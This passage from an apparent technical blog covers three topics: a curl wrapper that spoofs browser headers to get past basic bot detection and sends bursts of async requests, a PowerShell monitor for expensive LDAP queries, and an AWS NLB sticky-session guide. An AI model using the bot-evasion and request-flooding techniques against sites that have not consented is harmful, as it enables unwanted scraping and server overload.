  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available anywhere then install it on your path using:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

TestTimeRequests/sec
Single sync requestapproximately 0.2s
10 async requests (–count)approximately 0.03s333/s
100 async requests (–count)approximately 0.09s1111/s
1000 async requests (–count)approximately 0.8s1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Resources

0
0

Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath “C:\Logs\LDAP”

[CmdletBinding()]
param(
    [int]$ThresholdSeconds = 5,
    [string]$LogPath = "C:\LDAPDiagnostics",
    [int]$MonitorDuration = 0  # 0 = continuous
)

# Requires Administrator privileges
#Requires -RunAsAdministrator

# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
    New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}

$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"

function Write-Log {
    param([string]$Message, [string]$Level = "INFO")
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $logMessage = "[$timestamp] [$Level] $Message"
    Write-Host $logMessage
    Add-Content -Path $logFile -Value $logMessage
}

function Get-LDAPStatistics {
    try {
        # Query NTDS performance counters for LDAP statistics
        $ldapStats = @{
            ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
            BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
        }
        return $ldapStats
    }
    catch {
        Write-Log "Error getting LDAP statistics: $_" "ERROR"
        return $null
    }
}

function Parse-LDAPEvent {
    param($Event)
    
    $eventData = @{
        TimeCreated = $Event.TimeCreated
        ClientIP = $null
        ClientPort = $null
        StartingNode = $null
        Filter = $null
        SearchScope = $null
        AttributeSelection = $null
        ServerControls = $null
        VisitedEntries = $null
        ReturnedEntries = $null
        TimeInServer = $null
    }

    # Parse event XML for detailed information
    try {
        $xml = [xml]$Event.ToXml()
        $dataNodes = $xml.Event.EventData.Data
        
        foreach ($node in $dataNodes) {
            switch ($node.Name) {
                "Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
                "StartingNode" { $eventData.StartingNode = $node.'#text' }
                "Filter" { $eventData.Filter = $node.'#text' }
                "SearchScope" { $eventData.SearchScope = $node.'#text' }
                "AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
                "ServerControls" { $eventData.ServerControls = $node.'#text' }
                "VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
                "ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
                "TimeInServer" { $eventData.TimeInServer = $node.'#text' }
            }
        }
    }
    catch {
        Write-Log "Error parsing event XML: $_" "WARNING"
    }

    return $eventData
}

Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"

# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
    $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
    $currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
    
    if ($currentValue.'15 Field Engineering' -lt 5) {
        Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
        Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
        Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
    }
    else {
        Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
    }
}
catch {
    Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}

# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader

Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"

$startTime = Get-Date
$queriesLogged = 0

try {
    while ($true) {
        # Check if monitoring duration exceeded
        if ($MonitorDuration -gt 0) {
            $elapsed = (Get-Date) - $startTime
            if ($elapsed.TotalMinutes -ge $MonitorDuration) {
                Write-Log "Monitoring duration reached. Stopping." "INFO"
                break
            }
        }

        # Get current LDAP statistics
        $stats = Get-LDAPStatistics
        if ($stats) {
            Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
        }

        # Query Directory Service event log for expensive LDAP queries
        # Event ID 1644 = expensive search operations
        $events = Get-WinEvent -FilterHashtable @{
            LogName = 'Directory Service'
            Id = 1644
            StartTime = (Get-Date).AddSeconds(-10)
        } -ErrorAction SilentlyContinue

        foreach ($event in $events) {
            $eventData = Parse-LDAPEvent -Event $event
            
            # Convert time in server from milliseconds to seconds
            $timeInSeconds = if ($eventData.TimeInServer) { 
                [int]$eventData.TimeInServer / 1000 
            } else { 
                0 
            }

            if ($timeInSeconds -ge $ThresholdSeconds) {
                $queriesLogged++
                
                Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
                Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
                Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
                Write-Log "Duration: $timeInSeconds seconds" "WARNING"
                Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
                Write-Log "Filter: $($eventData.Filter)" "WARNING"
                Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
                Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
                Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
                Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
                Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
                Write-Log "======================================" "WARNING"

                # Write to CSV
                $csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
                Add-Content -Path $csvFile -Value $csvLine
            }
        }

        Start-Sleep -Seconds 5
    }
}
catch {
    Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
    Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
    Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
    Write-Log "Log file: $logFile" "INFO"
    Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples

### Basic Usage (Continuous Monitoring)

Run with default settings - monitors queries taking 5+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1
```

### Custom Threshold and Duration

Monitor for 30 minutes, logging queries that take 3+ seconds:

```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```

### Custom Log Location

Save logs to a specific directory:

```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```

### Verbose Output

See real-time LDAP statistics while monitoring:

```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```

## Requirements

- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**

## Understanding the Output

### Log File Example

```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```

### What to Look For

- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly

## Troubleshooting Common Issues

### No Events Appearing

If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:

```powershell
# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
    Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}
```

### Script Requires Restart

After enabling Field Engineering logging, you may need to restart the NTDS service:

```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

0
0

Deep Dive: AWS NLB Sticky Sessions (stickiness) Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution, fast, fair, and stateless.
But what if your backend holds stateful sessions, like in-memory login sessions, caching, or WebSocket connections and you need a given client to keep hitting the same target every time?

That’s where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They’re powerful but also misunderstood and misconfiguring them can lead to uneven load, dropped connections, or mysterious client “resets.”

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB) — which uses HTTP cookies for stickiness, the NLB operates at Layer 4 (TCP/UDP).
That means it doesn’t look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target — even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups
    Find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab
  3. Under Attributes, set:
  • Stickiness.enabled = true
  • Stickiness.type = source_ip
  1. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
--target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
--attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip

How to Verify:

aws elbv2 describe-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123

Sample Output:

{
    "Attributes": [
        { "Key": "stickiness.enabled", "Value": "true" },
        { "Key": "stickiness.type", "Value": "source_ip" }
    ]
}

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters, often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration).

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches == same backend target.
  • If any part of that tuple changes (e.g. client source port changes), the hash may change == client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.

Not Cookie Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

IssueCauseEffect
Client source IP changesNAT, VPN, mobile switching networksHash changes → new target
Different source portClient opens multiple sockets or reconnectsEach connection may map differently
TLS termination at NLBNLB terminates TLSStickiness not supported (only for TCP listeners)
Unhealthy targetHealth check failsMapping breaks; NLB reroutes
Cross-zone load balancing toggledDistribution rules changeMay break existing sticky mappings
DNS round-robin at clientNLB has multiple IPs per AZClient DNS resolver may change NLB node
UDP behaviorStateless packets; different flow hashStickiness unreliable for UDP
Scaling up/downNew targets addedHash table rebalanced; some clients remapped

Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check target group attributes: aws elbv2 describe-target-group-attributes --target-group-arn <arn> Ensure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics. If one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety.

2. “Some clients lose session state randomly”

  • Verify client network stability. Mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design, if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance: one instance overloaded”

  • This can happens when many users share one public IP (common in offices or ISPs).
    All those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands below:
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time

# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl

# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes

# View all at once
sysctl -a | grep tcp_keepalive
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.

Quick test with curl:

for i in {1..100}; do 
    echo "=== Request $i at $(date) ===" | tee -a curl_test.log
    curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
    sleep 0.5
done

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN; you’ll likely see a different target.

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing during traffic, it resets the sticky map.
  5. Set up proper health checks. Unhealthy targets break affinity immediately.
  6. Monitor uneven load. Large NAT’d user groups can overload a single instance.
  7. For UDP consider designing idempotent stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.

9. Summary Table

AttributeSupported ValueNotes
stickiness.enabledtrue / falseEnables sticky sessions
stickiness.typesource_ipOnly option for NLB
Supported ProtocolsTCP, UDP (limited)Not supported for TLS listeners
Persistence DurationUntil flow resetNot configurable
Cookie-based Stickiness❌ NoUse ALB for cookie-based
Best forStateful TCP appse.g. games, custom protocols

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per application stickiness
  • Layer 7 routing and metrics

The NLB should be reserved for high performance, low latency, or non HTTP workloads that need raw TCP/UDP handling.

11. Closing Thoughts

AWS NLB sticky sessions are a great feature, but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity. However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
1. Keep your app stateless,
2. Let the load balancer do its job, and
3. Use stickiness only as a last resort for legacy or session bound systems.

🧩 References

0
0